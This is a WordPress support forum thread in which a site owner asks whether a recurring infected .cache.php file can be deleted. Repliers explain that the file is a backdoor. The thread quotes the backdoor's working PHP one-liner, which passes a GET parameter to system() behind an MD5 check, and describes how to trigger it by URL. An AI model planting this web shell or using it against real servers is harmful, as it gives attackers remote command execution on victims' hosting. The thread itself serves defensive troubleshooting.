Safe to delete cache.php from public_html

  • Recently I’ve installed the paid premium version of MalCare to address malware-infections on my site. It’s hosted through ASmallOrange with a godaddy domain…it keeps finding the same ‘infected’ file, every day. Every day it says it removes it, every day it comes back and finds it again. The file is this: (i’ve changed the actual name to MYSITEPROFILE that’s not the name)

    /home2/MYSITEPROFILE/public_html/.cache.php

    And it tells me the issue is this:
    <?php if (substr(md5($_GET[“localdate”]),0,6) == “b021c2”) { $time = str_replace(“@”,” “,$_GET[“localtime”]); @system($time); exit; } ?>

    It claims it’s Obfuscated:PHP/suspiciousFunction.9336 (which is some time of auto-generated smaller backdoor malware.)

    I’m wondering as the MalCare premium that I’m paying for does not actually seem to be resolving the issue…

    Can I just delete the cache.php file manually from CPanel? Will that cause catastrophe? Will that solve my issue?

Viewing 4 replies - 1 through 4 (of 4 total)
  • Moderator James Huff

    (@macmanx)

    Are you using a caching plugin?

    Thread Starter theatrebloom 2086

    (@theatrebloom-2086)

    i don’t think so?

    Moderator James Huff

    (@macmanx)

    In that case, carefully follow?this guide. When you’re done, you may want to implement some (if not all) of?the recommended security measures?and?start backing up your site.

    James is right: Yes, your website is infected.

    No, deleting the file won’t solve your issue. As you say, it will come back, as long as the the vulnerability that generates it is still unidentified and functional.

    Using system(…) within WP is usually not the best idea, but system($_GET[…]) is simply a backdoor and doesn’t really try to hide it.
    So a simple call of
    MYSITEPROFILE.tld?localdate=my_secret_which_matches_the_MD5_check&localtime=do@whatever@i@want
    will execute the command “do whatever i want” at system level (sic!).

Viewing 4 replies - 1 through 4 (of 4 total)
  • You must be logged in to reply to this topic.